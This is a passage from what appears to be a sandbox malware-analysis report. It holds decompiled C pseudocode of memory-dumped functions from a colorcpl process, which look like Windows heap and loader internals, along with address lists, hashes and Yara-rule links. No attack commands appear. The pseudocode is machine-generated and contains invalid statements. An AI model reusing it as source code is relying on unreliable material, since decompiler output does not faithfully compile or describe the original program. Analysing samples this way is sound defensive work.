								 *((intOrPtr*)(_t151 + 4)) = _t195;
								 *_t195 = _t151;
								 *0x4433424 = _t151;
								 *((intOrPtr*)(_t204 - 4)) = 1;
								E04343B87();
								L043453C0(0x4436898);
								_t154 =  *0x4436974; // 0x0
								if(_t154 != 0) {
									_t197 = E04414000(0x4433420, _t202, 0x4434120, _t154);
									 *((intOrPtr*)(_t204 - 0x1c)) = _t197;
								}
								_t142 = E043452F0(0x4433420, 0x4436898);
								goto L28;
							}
						}
					}
				}
			}

0x043437e4
0x043437e6
0x043437eb
0x043437f0
0x043437f3
0x043437fc
0x043437ff
0x04343804
0x04343810
0x04343817
0x0439fdfd
0x04343b4c
0x04343b51
0x04343b5d
0x04343b5d
0x0434381d
0x04343820
0x04343823
0x04343826
0x0434382f
0x04343837
0x0439fe09
0x0439fe0f
0x0439fe0f
0x0439fe09
0x0434383d
0x0434385e
0x04343860
0x04343863
0x04343866
0x0434386f
0x0439fe17
0x0439fe17
0x0439fe1c
0x00000000
0x04343875
0x04343875
0x0434387b
0x04343881
0x0434389b
0x0434389d
0x043438a2
0x0439fe24
0x0439fe29
0x0439fe2c
0x04343b19
0x04343b19
0x04343b20
0x04343b27
0x04343b2e
0x00000000
0x00000000
0x04343b33
0x04343b3c
0x0439ff3f
0x0439ff44
0x0439ff47
0x04343b42
0x04343b42
0x04343b42
0x04343b4a
0x04343bbb
0x04343bbd
0x04343bbd
0x00000000
0x04343b4a
0x043438a8
0x043438aa
0x043438ad
0x043438b0
0x043438b6
0x043438c6
0x043438ca
0x043438cb
0x043438cb
0x043438d0
0x043438d2
0x043438d2
0x043438da
0x00000000
0x00000000
0x043438df
0x043438e2
0x043438e5
0x043438e8
0x043438ea
0x043438ea
0x043438ed
0x043438f3
0x043438f9
0x0434390f
0x04343914
0x04343917
0x0434391c
0x00000000
0x00000000
0x04343922
0x04343928
0x0434392e
0x04343946
0x0434394b
0x0434394e
0x04343953
0x00000000
0x00000000
0x04343959
0x04343959
0x0434395f
0x04343962
0x04343964
0x04343969
0x0434396b
0x04343970
0x04343970
0x04343973
0x04343976
0x04343979
0x04343986
0x04343988
0x0434398d
0x00000000
0x04343993
0x04343993
0x0434399d
0x043439a0
0x043439a3
0x043439a6
0x043439a9
0x043439ac
0x043439af
0x043439b2
0x043439bb
0x0439fe36
0x043439c1
0x043439c1
0x043439c1
0x043439c2
0x043439c5
0x043439c5
0x043439c8
0x043439cb
0x043439cc
0x043439cd
0x043439d2
0x043439d8
0x043439da
0x043439df
0x00000000
0x043439e5
0x043439e8
0x043439eb
0x043439f1
0x043439f5
0x043439f7
0x043439f7
0x043439fc
0x04343a06
0x04343a08
0x04343a08
0x04343a0a
0x04343a0d
0x04343a10
0x04343a13
0x04343a16
0x04343a17
0x04343a18
0x04343a1d
0x04343a22
0x04343a24
0x04343a25
0x04343a30
0x04343a32
0x04343a37
0x04343b0a
0x04343b0a
0x04343b0d
0x04343b14
0x00000000
0x04343a3d
0x04343a41
0x04343b5e
0x04343b63
0x04343b64
0x04343b66
0x04343b6e
0x04343b70
0x04343b75
0x00000000
0x00000000
0x04343b7b
0x04343b7b
0x04343a47
0x04343a4a
0x04343a50
0x04343a56
0x04343a5d
0x04343a5d
0x04343a60
0x04343a63
0x04343a65
0x04343a65
0x04343a68
0x04343a6b
0x04343a6d
0x04343a6d
0x04343a73
0x04343a76
0x04343a7e
0x04343a86
0x04343a89
0x04343a8f
0x04343a99
0x04343a9b
0x04343aa0
0x00000000
0x00000000
0x04343aa2
0x04343aa4
0x04343aac
0x04343ab1
0x04343ab8
0x04343ab8
0x04343abe
0x04343acb
0x04343bb6
0x04343bb9
0x00000000
0x04343bb9
0x04343ad1
0x04343ad3
0x04343ad6
0x04343ad8
0x04343add
0x04343ae4
0x04343aee
0x04343af3
0x04343afa
0x0439fe55
0x0439fe57
0x0439fe57
0x04343b05
0x00000000
0x04343b05
0x04343a37
0x043439df
0x0434398d

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee220beb718992e327f81777aa07335bd39b3da5253b7d4ee10b3dc16c79b659
Instruction ID: f61efc35ac925d341ef7410d85f45cfdf48eee2b0da0b845074743edb1c40328
Opcode Fuzzy Hash: ee220beb718992e327f81777aa07335bd39b3da5253b7d4ee10b3dc16c79b659
Instruction Fuzzy Hash: 63C133B1A006059FDB25DFA9C840BAEBBF4FF88754F11542AE91AEB750E734B901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04350445 Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E04350445(signed int __ecx, intOrPtr __edx) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t105;
				signed int _t107;
				intOrPtr _t108;
				unsigned int _t112;
				signed int _t114;
				signed int _t125;
				signed int _t126;
				signed char* _t129;
				intOrPtr _t130;
				signed int _t131;
				signed char* _t134;
				signed int _t140;
				char* _t143;
				unsigned int _t160;
				signed int _t177;
				signed int _t180;
				char _t181;
				signed int _t183;
				signed int _t188;
				signed int* _t201;
				intOrPtr _t208;
				signed int* _t209;
				unsigned int _t210;
				signed int _t211;
				signed int _t216;

				_t208 = __edx;
				_t216 = __ecx;
				_v24 = __edx;
				_t171 = 0;
				_t3 = _t208 + 0xfff; // 0xfff
				_v16 = _t3 & 0xfffff000;
				if(E04350680(__ecx,  &_v16) == 0) {
					__eflags =  *(_t216 + 0x40) & 0x00000002;
					if(( *(_t216 + 0x40) & 0x00000002) == 0) {
						L59:
						__eflags =  *(_t216 + 0x40) & 0x00000080;
						if(( *(_t216 + 0x40) & 0x00000080) == 0) {
							L63:
							_t209 = 0;
							__eflags = _t171;
							if(_t171 != 0) {
								__eflags =  *(_t216 + 0x4c);
								if( *(_t216 + 0x4c) != 0) {
									 *(_t171 + 3) =  *(_t171 + 2) ^  *(_t171 + 1) ^  *_t171;
									 *_t171 =  *_t171 ^  *(_t216 + 0x50);
								}
							}
							L3:
							return _t209;
						}
						_t171 = E043E790F(_t216);
						__eflags = _t171;
						if(_t171 == 0) {
							goto L63;
						}
						__eflags = ( *_t171 & 0x0000ffff) - _t208;
						if(( *_t171 & 0x0000ffff) < _t208) {
							goto L63;
						}
						_t209 = _t171;
						goto L3;
					}
					_v12 = _v12 & 0;
					_t210 = _t208 + 0x2000;
					_t105 =  *((intOrPtr*)(_t216 + 0x64));
					__eflags = _t210 - _t105;
					if(_t210 > _t105) {
						_t105 = _t210;
					}
					__eflags =  *((char*)(_t216 + 0xea)) - 2;
					if( *((char*)(_t216 + 0xea)) != 2) {
						_t177 = 0;
					} else {
						_t177 =  *(_t216 + 0xe4);
					}
					__eflags = _t177;
					if(_t177 == 0) {
						__eflags = _t105 - 0x3f4000;
						if(_t105 >= 0x3f4000) {
							 *(_t216 + 0x48) =  *(_t216 + 0x48) | 0x20000000;
						}
					}
					_t107 = _t105 + 0x0000ffff & 0xffff0000;
					_v8 = _t107;
					__eflags = _t107 - 0xfd0000;
					if(_t107 >= 0xfd0000) {
						_v8 = 0xfd0000;
					}
					_t108 = E0433F0E1(_t216, 1);
					_push(_t108);
					_push(0x2000);
					_v28 = _t108;
					_push( &_v8);
					_push(0);
					_push( &_v12);
					_push(0xffffffff);
					_t180 = E04382B10();
					__eflags = _t180;
					if(_t180 < 0) {
						while(1) {
							_t112 = _v8;
							__eflags = _t112 - _t210;
							if(_t112 == _t210) {
								break;
							}
							_t160 = _t112 >> 1;
							_v8 = _t160;
							__eflags = _t160 - _t210;
							if(_t160 < _t210) {
								_v8 = _t210;
							}
							_push(_v28);
							_push(0x2000);
							_push( &_v8);
							_push(0);
							_push( &_v12);
							_push(0xffffffff);
							_t180 = E04382B10();
							__eflags = _t180;
							if(_t180 < 0) {
								continue;
							} else {
								_t112 = _v8;
								break;
							}
						}
						__eflags = _t180;
						if(_t180 >= 0) {
							goto L12;
						}
						 *((intOrPtr*)(_t216 + 0x224)) =  *((intOrPtr*)(_t216 + 0x224)) + 1;
						_t208 = _v24;
						goto L59;
					} else {
						_t112 = _v8;
						L12:
						_t208 = _v24;
						 *((intOrPtr*)(_t216 + 0x64)) =  *((intOrPtr*)(_t216 + 0x64)) + _t112;
						_t30 = _t208 + 0x1000; // 0x4358a73
						_t181 = _t30;
						__eflags = _t181 -  *((intOrPtr*)(_t216 + 0x68));
						if(_t181 <=  *((intOrPtr*)(_t216 + 0x68))) {
							_t181 =  *((intOrPtr*)(_t216 + 0x68));
						}
						_v20 = _t181;
						_t114 = E043768EA( *((intOrPtr*)(_t216 + 0x1f8)) -  *((intOrPtr*)(_t216 + 0x244)), _t216, _t216 + 0xd4);
						__eflags = _t114;
						if(_t114 == 0) {
							L58:
							E0433FABA( &_v12,  &_v8, 0x8000);
							goto L59;
						} else {
							_push(_v28);
							_push(0x1000);
							_push( &_v20);
							_push(0);
							_push( &_v12);
							_push(0xffffffff);
							_t211 = E04382B10();
							__eflags = _t211;
							if(_t211 < 0) {
								L57:
								_t208 = _v24;
								goto L58;
							}
							_t125 = E04371EED(_t216, _v12, 0x40, _t181, 2, _v12, _v20 + _v12, _v8 + 0xfffff000 + _t197);
							__eflags = _t125;
							if(_t125 == 0) {
								_t211 = 0xc0000017;
							}
							__eflags = _t211;
							if(_t211 < 0) {
								goto L57;
							} else {
								_t126 = E04353C40();
								_t212 = 0x7ffe0380;
								__eflags = _t126;
								if(_t126 != 0) {
									_t129 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t129 = 0x7ffe0380;
								}
								__eflags =  *_t129;
								if( *_t129 != 0) {
									_t130 =  *[fs:0x30];
									__eflags =  *(_t130 + 0x240) & 0x00000001;
									if(( *(_t130 + 0x240) & 0x00000001) != 0) {
										E043FEFD3(0x226, _t216, _v12, _v20, 4);
										__eflags = E04353C40();
										if(__eflags != 0) {
											_t212 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										_t183 = _t216;
										E043FF1C3(0x226, _t183,  *(_v12 + 0x24), __eflags, _v20,  *(_t216 + 0x74) << 3,  *_t212 & 0x000000ff);
									}
								}
								_t131 = E04353C40();
								_t213 = 0x7ffe038a;
								__eflags = _t131;
								if(_t131 != 0) {
									_t134 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t134 = 0x7ffe038a;
								}
								__eflags =  *_t134;
								if( *_t134 != 0) {
									__eflags = E04353C40();
									if(__eflags != 0) {
										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									}
									_t183 = _t216;
									E043FF1C3(0x230, _t183,  *(_v12 + 0x24), __eflags, _v20,  *(_t216 + 0x74) << 3,  *_t213 & 0x000000ff);
								}
								_t140 = E04353C40();
								__eflags = _t140;
								if(_t140 != 0) {
									_t143 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								} else {
									_t143 = 0x7ffe0388;
								}
								__eflags =  *_t143;
								if( *_t143 != 0) {
									_t183 = _t216;
									E043FDAAF(0x230, _t183, _v12, _v8);
								}
								__eflags =  *(_t216 + 0x4c);
								_t201 =  *(_v12 + 0x24);
								if( *(_t216 + 0x4c) != 0) {
									 *_t201 =  *_t201 ^  *(_t216 + 0x50);
									__eflags = _t201[0] - (_t201[0] ^ _t201[0] ^  *_t201);
									if(__eflags != 0) {
										_push(_t183);
										E043FD646(0x230, _t216, _t201, _t213, _t216, __eflags);
									}
								}
								_t209 =  *(_v12 + 0x24);
								goto L3;
							}
						}
					}
				}
				_v16 = _v16 >> 3;
				_t209 = E04351EB2(_t216, _t98,  &_v16, 0);
				_t188 = _t216;
				E04350B10(_t188, _t209, _v16);
				if( *(_t216 + 0x4c) != 0) {
					 *_t209 =  *_t209 ^  *(_t216 + 0x50);
					if(_t209[0] != (_t209[0] ^ _t209[0] ^  *_t209)) {
						_push(_t188);
						E043FD646(0, _t216, _t209, _t209, _t216, __eflags);
					}
				}
				goto L3;
			}

0x04350450
0x04350452
0x04350457
0x0435045a
0x0435045c
0x04350467
0x04350471
0x043504b5
0x043504b9
0x043a4e4b
0x043a4e4b
0x043a4e4f
0x043a4e6c
0x043a4e6c
0x043a4e6e
0x043a4e70
0x043a4e76
0x043a4e79
0x043a4e87
0x043a4e8d
0x043a4e8d
0x043a4e79
0x043504ae
0x043504b4
0x043504b4
0x043a4e58
0x043a4e5a
0x043a4e5c
0x00000000
0x00000000
0x043a4e61
0x043a4e63
0x00000000
0x00000000
0x043a4e65
0x00000000
0x043a4e65
0x043504bf
0x043504c2
0x043504c8
0x043504cb
0x043504cd
0x043a4ceb
0x043a4ceb
0x043504d3
0x043504da
0x04350652
0x043504e0
0x043504e0
0x043504e0
0x043504e6
0x043504e8
0x04350659
0x0435065e
0x043a4cf2
0x043a4cf2
0x0435065e
0x043504f8
0x043504fd
0x04350500
0x04350502
0x043a4cfe
0x043a4cfe
0x0435050d
0x04350512
0x04350513
0x04350518
0x0435051e
0x0435051f
0x04350524
0x04350525
0x0435052c
0x0435052e
0x04350530
0x043a4d06
0x043a4d06
0x043a4d09
0x043a4d0b
0x00000000
0x00000000
0x043a4d0d
0x043a4d0f
0x043a4d12
0x043a4d14
0x043a4d16
0x043a4d16
0x043a4d19
0x043a4d1f
0x043a4d24
0x043a4d25
0x043a4d2a
0x043a4d2b
0x043a4d32
0x043a4d34
0x043a4d36
0x00000000
0x043a4d38
0x043a4d38
0x00000000
0x043a4d38
0x043a4d36
0x043a4d3b
0x043a4d3d
0x00000000
0x00000000
0x043a4d43
0x043a4d49
0x00000000
0x04350536
0x04350536
0x04350539
0x04350539
0x0435053c
0x0435053f
0x0435053f
0x04350545
0x04350548
0x04350669
0x04350669
0x04350562
0x04350565
0x0435056a
0x0435056c
0x043a4e3a
0x043a4e46
0x00000000
0x04350572
0x04350572
0x04350578
0x0435057d
0x0435057e
0x04350583
0x04350584
0x0435058b
0x0435058d
0x0435058f
0x043a4e37
0x043a4e37
0x00000000
0x043a4e37
0x043505b1
0x043505b6
0x043505b8
0x043a4d51
0x043a4d51
0x043505be
0x043505c0
0x00000000
0x043505c6
0x043505c6
0x043505cb
0x043505d5
0x043505d7
0x043a4d64
0x043505dd
0x043505dd
0x043505dd
0x043505df
0x043505e2
0x043a4d6b
0x043a4d71
0x043a4d78
0x043a4d88
0x043a4d92
0x043a4d94
0x043a4d9f
0x043a4d9f
0x043a4d9f
0x043a4da4
0x043a4db7
0x043a4db7
0x043a4d78
0x043505e8
0x043505ed
0x043505f7
0x043505f9
0x043a4dca
0x043505ff
0x043505ff
0x043505ff
0x04350601
0x04350604
0x043a4dd6
0x043a4dd8
0x043a4de3
0x043a4de3
0x043a4de3
0x043a4de8
0x043a4dfb
0x043a4dfb
0x0435060a
0x0435060f
0x04350611
0x043a4e0e
0x04350617
0x04350617
0x04350617
0x0435061c
0x0435061f
0x043a4e1e
0x043a4e20
0x043a4e20
0x04350625
0x0435062c
0x0435062f
0x04350634
0x0435063e
0x04350641
0x043a4e2a
0x043a4e2d
0x043a4e2d
0x04350641
0x0435064a
0x00000000
0x0435064a
0x043505c0
0x0435056c
0x04350530
0x04350473
0x04350488
0x0435048a
0x0435048e
0x04350496
0x0435049b
0x043504a8
0x043a4cdc
0x043a4ce1
0x043a4ce1
0x043504a8
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
Instruction ID: 38433855b3b40ab4a877079a11db50643b47b8868d51fe6d19580247fb9be211
Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
Instruction Fuzzy Hash: 69B10031700A45AFEB29CFA4C890FBEBBBAEF84304F141568D9529B691E771F940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0436E507 Relevance: .3, Instructions: 278
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0436E507(intOrPtr* __ecx, intOrPtr* __edx) {
				char _v5;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				char _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v88;
				signed int _t78;
				void* _t81;
				char* _t84;
				intOrPtr _t85;
				intOrPtr _t97;
				signed int _t100;
				signed int _t105;
				intOrPtr _t108;
				signed int _t116;
				signed int _t117;
				signed char* _t118;
				signed int _t125;
				signed int _t126;
				signed char* _t127;
				intOrPtr* _t131;
				char* _t132;
				intOrPtr* _t151;
				signed int _t152;
				intOrPtr _t153;
				signed int _t155;
				signed int _t156;

				_t151 = __ecx;
				_t131 = __edx;
				_v28 = __edx;
				_t153 =  *((intOrPtr*)(__ecx + 0x20));
				_v32 =  *((intOrPtr*)(__ecx + 0x60));
				if(E0436E662(__ecx, 0) != 0) {
					return 0xc000022d;
				} else {
					_t135 =  *((intOrPtr*)(_t153 + 0x18));
					_t6 = _t153 + 0x24; // 0x123
					_t78 = _t6;
					_t146 = _t78;
					_v16 = _t78;
					E0435DF36( *((intOrPtr*)(_t153 + 0x18)), _t146, 0x14a5);
					_v88 = 0x18;
					_v84 = 0;
					0x840 = 0x40;
					if( *0x4435d58 != 0) {
					}
				}
				_v76 = 0x840;
				_v80 = _t131;
				_v72 = 0;
				_v68 = 0;
				_t81 = E04353C40();
				_t132 = 0x7ffe0384;
				if(_t81 != 0) {
					_t84 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t84 = 0x7ffe0384;
				}
				if( *_t84 != 0) {
					_t85 =  *[fs:0x30];
					__eflags =  *(_t85 + 0x240) & 0x00000004;
					if(( *(_t85 + 0x240) & 0x00000004) != 0) {
						_t126 = E04353C40();
						__eflags = _t126;
						if(_t126 == 0) {
							_t127 = 0x7ffe0385;
						} else {
							_t127 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						__eflags =  *_t127 & 0x00000020;
						if(( *_t127 & 0x00000020) != 0) {
							_t146 = _t146 | 0xffffffff;
							_t135 = 0x1485;
							E043C0227(0x1485, _t146, 0xffffffff, 0xffffffff, 0, 0);
						}
					}
				}
				if(( *( *[fs:0x30] + 0x68) & 0x00040000) != 0) {
					_t135 = _v28;
					_push(0);
					_push(0);
					_push(0);
					_v48 =  *_t135;
					_v44 =  *((intOrPtr*)(_t135 + 4));
					_push(8);
					_push( &_v48);
					_push(0x26);
					E04384580();
				}
				_v24 = 0;
				while(1) {
					_push(0x60);
					_push(5);
					_push( &_v64);
					_push( &_v88);
					_push(0x100021);
					_push( &_v12);
					_t155 = E04382CE0();
					if(_t155 >= 0) {
						break;
					}
					__eflags = _t155 - 0xc0000034;
					if(_t155 == 0xc0000034) {
						L38:
						_t155 = 0xc0000135;
						L39:
						__eflags = _t155;
						if(_t155 < 0) {
							L19:
							return _t155;
						}
						break;
					}
					__eflags = _t155 - 0xc000003a;
					if(_t155 == 0xc000003a) {
						goto L38;
					}
					__eflags = _t155 - 0xc0000022;
					if(_t155 != 0xc0000022) {
						goto L39;
					}
					__eflags = _v24;
					if(__eflags != 0) {
						goto L19;
					}
					_t135 = _t151;
					_t125 = E043BFBC2(_t151, __eflags);
					__eflags = _t125;
					if(_t125 == 0) {
						goto L19;
					}
					_v24 = 1;
				}
				if( *0x4435d3c != 0) {
					_t146 = _v12;
					_t155 = E043C3ECC(_t151, _v12, _t135);
					__eflags = _t155;
					if(_t155 >= 0) {
						goto L10;
					}
					__eflags =  *0x4435d10;
					if( *0x4435d10 != 0) {
						L18:
						_push(_v12);
						E04382A80();
						goto L19;
					}
				}
				L10:
				if(( *(_t151 + 0x10) & 0x01000000) != 0) {
					_t97 =  *[fs:0x30];
					__eflags =  *(_t97 + 3) & 0x00000010;
					if(( *(_t97 + 3) & 0x00000010) != 0) {
						goto L11;
					}
					_t146 =  *(_t151 + 0x20);
					_t155 = E043C3E62(_v12,  *(_t151 + 0x20),  &_v36, 8,  &_v5);
					__eflags = _t155;
					if(_t155 < 0) {
						goto L18;
					}
				}
				L11:
				_push(_v12);
				_push(0x1000000);
				_push(0x10);
				_push(0);
				_push(0);
				_push(0xd);
				_push( &_v20);
				_t155 = E04382E50();
				if(_t155 < 0) {
					__eflags = _t155 - 0xc000047e;
					if(_t155 == 0xc000047e) {
						L56:
						_t100 = E043BC3B0(_t155);
						_t152 = _v16;
						_t155 = _t100;
						L57:
						E0437C98F(_t155, 0x1485, 0, _t152);
						goto L18;
					}
					__eflags = _t155 - 0xc000047f;
					if(_t155 == 0xc000047f) {
						goto L56;
					}
					__eflags = _t155 - 0xc0000462;
					if(_t155 == 0xc0000462) {
						goto L56;
					}
					_t152 = _v16;
					__eflags = _t155 - 0xc0000017;
					if(_t155 != 0xc0000017) {
						__eflags = _t155 - 0xc000009a;
						if(_t155 != 0xc000009a) {
							__eflags = _t155 - 0xc000012d;
							if(_t155 != 0xc000012d) {
								_v56 = _t152;
								_push( &_v40);
								_push(1);
								_v52 = _t155;
								_push( &_v56);
								_push(1);
								_push(2);
								_push(0xc000007b);
								_t105 = E04384020();
								__eflags = _t105;
								if(_t105 >= 0) {
									__eflags =  *0x44365f4 - 3;
									if( *0x44365f4 != 3) {
										 *0x4435a9c =  *0x4435a9c + 1;
									}
								}
							}
						}
					}
					goto L57;
				}
				if(E04353C40() != 0) {
					_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t132 != 0) {
					_t108 =  *[fs:0x30];
					__eflags =  *(_t108 + 0x240) & 0x00000004;
					if(( *(_t108 + 0x240) & 0x00000004) != 0) {
						_t117 = E04353C40();
						__eflags = _t117;
						if(_t117 == 0) {
							_t118 = 0x7ffe0385;
						} else {
							_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						__eflags =  *_t118 & 0x00000020;
						if(( *_t118 & 0x00000020) != 0) {
							E043C0227(0x1486, _t146 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
						}
					}
				}
				if(( *(_t151 + 0x10) & 0x00000100) != 0) {
					L21:
					__eflags = _t155;
					if(_t155 < 0) {
						goto L17;
					} else {
						goto L16;
					}
				} else {
					if( *0x44368e4 != 0) {
						_t156 =  *0x4435b64; // 0x0
						asm("ror esi, cl");
						 *0x44391e0(_v12, _v28, 0x20);
						_t116 =  *(_t156 ^  *0x7ffe0330)();
						_t70 = _t116 + 0x3ffffddb; // 0x3ffffddb
						asm("sbb esi, esi");
						_t155 =  ~_t70 & _t116;
						goto L21;
					}
					L16:
					_t155 = E04361332(_t151, _v20);
					if(_v32 != 0) {
						__eflags = _t155;
						if(_t155 < 0) {
							goto L17;
						}
						 *(_t151 + 0x64) = _v12;
						 *((intOrPtr*)(_t151 + 0xc)) = _v20;
						goto L19;
					}
					L17:
					_push(_v20);
					E04382A80();
					goto L18;
				}
			}

0x0436e512
0x0436e514
0x0436e518
0x0436e51e
0x0436e521
0x0436e52b
0x00000000
0x0436e531
0x0436e531
0x0436e534
0x0436e534
0x0436e53c
0x0436e53e
0x0436e541
0x0436e548
0x0436e558
0x0436e55b
0x0436e55c
0x0436e55c
0x0436e55c
0x0436e563
0x0436e566
0x0436e569
0x0436e56c
0x0436e56f
0x0436e574
0x0436e57b
0x043af88f
0x0436e581
0x0436e581
0x0436e581
0x0436e586
0x043af899
0x043af89f
0x043af8a6
0x043af8ac
0x043af8b1
0x043af8b3
0x043af8c5
0x043af8b5
0x043af8be
0x043af8be
0x043af8ca
0x043af8cd
0x043af8d9
0x043af8dc
0x043af8e1
0x043af8e1
0x043af8cd
0x043af8a6
0x0436e599
0x043af8eb
0x043af8ee
0x043af8ef
0x043af8f0
0x043af8f3
0x043af8f9
0x043af8ff
0x043af901
0x043af902
0x043af904
0x043af904
0x0436e59f
0x0436e5a2
0x0436e5a2
0x0436e5a4
0x0436e5a9
0x0436e5ad
0x0436e5ae
0x0436e5b6
0x0436e5bc
0x0436e5c0
0x00000000
0x00000000
0x043af90e
0x043af914
0x043af94b
0x043af94b
0x043af950
0x043af950
0x043af952
0x0436e655
0x00000000
0x0436e655
0x00000000
0x043af958
0x043af916
0x043af91c
0x00000000
0x00000000
0x043af91e
0x043af924
0x00000000
0x00000000
0x043af926
0x043af92a
0x00000000
0x00000000
0x043af930
0x043af932
0x043af937
0x043af939
0x00000000
0x00000000
0x043af93f
0x043af93f
0x0436e5cd
0x043af95d
0x043af968
0x043af96a
0x043af96c
0x00000000
0x00000000
0x043af972
0x043af979
0x0436e64d
0x0436e64d
0x0436e650
0x00000000
0x0436e650
0x043af97f
0x0436e5d3
0x0436e5da
0x043af984
0x043af98a
0x043af98e
0x00000000
0x00000000
0x043af994
0x043af9a9
0x043af9ab
0x043af9ad
0x00000000
0x00000000
0x043af9b3
0x0436e5e0
0x0436e5e0
0x0436e5e6
0x0436e5eb
0x0436e5ed
0x0436e5ef
0x0436e5f1
0x0436e5f3
0x0436e5f9
0x0436e5fd
0x043af9b8
0x043af9be
0x043afa1e
0x043afa1f
0x043afa24
0x043afa27
0x043afa29
0x043afa33
0x00000000
0x043afa33
0x043af9c0
0x043af9c6
0x00000000
0x00000000
0x043af9c8
0x043af9ce
0x00000000
0x00000000
0x043af9d0
0x043af9d3
0x043af9d9
0x043af9db
0x043af9e1
0x043af9e3
0x043af9e9
0x043af9ee
0x043af9f1
0x043af9f2
0x043af9f7
0x043af9fa
0x043af9fb
0x043af9fd
0x043af9ff
0x043afa04
0x043afa09
0x043afa0b
0x043afa0d
0x043afa14
0x043afa16
0x043afa16
0x043afa14
0x043afa0b
0x043af9e9
0x043af9e1
0x00000000
0x043af9d9
0x0436e60a
0x043afa46
0x043afa46
0x0436e613
0x043afa51
0x043afa57
0x043afa5e
0x043afa64
0x043afa69
0x043afa6b
0x043afa7d
0x043afa6d
0x043afa76
0x043afa76
0x043afa82
0x043afa85
0x043afa9b
0x043afa9b
0x043afa85
0x043afa5e
0x0436e620
0x0436e65c
0x0436e65c
0x0436e65e
0x00000000
0x0436e660
0x00000000
0x0436e660
0x0436e622
0x0436e629
0x043afaad
0x043afac1
0x043afac7
0x043afacd
0x043afacf
0x043afad7
0x043afad9
0x00000000
0x043afad9
0x0436e62f
0x0436e63d
0x0436e63f
0x043afae0
0x043afae2
0x00000000
0x00000000
0x043afaeb
0x043afaf1
0x00000000
0x043afaf1
0x0436e645
0x0436e645
0x0436e648
0x00000000
0x0436e648

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93973207485f4c3892964de7dea722fca212d835c0f72e6ef0f228ea06a84781
Instruction ID: 00d9098afa84b89697d64fa458d9e4aae6dbbd18c02bad697f92898f9fbd4065
Opcode Fuzzy Hash: 93973207485f4c3892964de7dea722fca212d835c0f72e6ef0f228ea06a84781
Instruction Fuzzy Hash: BBA12631F40615AFEB21DBA8C844BAEB7B4EF04728F05A115E912AB290E774FD14CB91

Uniqueness

Uniqueness Score: -1.00%

Function 043800A5 Relevance: .3, Instructions: 276
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E043800A5(intOrPtr* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v44;
				char _v52;
				signed int _v56;
				signed int _v60;
				char _v64;
				signed int _v68;
				signed int _v72;
				signed char _v76;
				char _v80;
				intOrPtr* _v84;
				intOrPtr* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t107;
				signed int _t118;
				signed int _t127;
				signed int _t130;
				intOrPtr _t141;
				intOrPtr _t147;
				signed int _t156;
				signed int _t157;
				signed char _t160;
				signed int _t164;
				signed int _t166;
				signed int _t180;
				unsigned int _t189;
				unsigned int _t190;
				unsigned int _t191;
				intOrPtr* _t201;
				signed int _t202;
				signed int _t205;
				signed int _t206;

				_v8 =  *0x443b370 ^ _t206;
				_t201 = _a8;
				_v84 = __edx;
				_t197 = 0;
				_v88 = _a4;
				_v60 = 0;
				_v72 = 0;
				_v68 = 0;
				if( *_t201 < 0xb0) {
					L31:
					_push(0x57);
					L32:
					_pop(_t101);
					L30:
